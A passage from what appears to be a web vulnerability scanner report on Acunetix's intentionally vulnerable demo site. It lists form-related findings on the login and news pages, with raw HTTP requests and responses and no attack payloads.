style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter
Attack
Evidence	<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
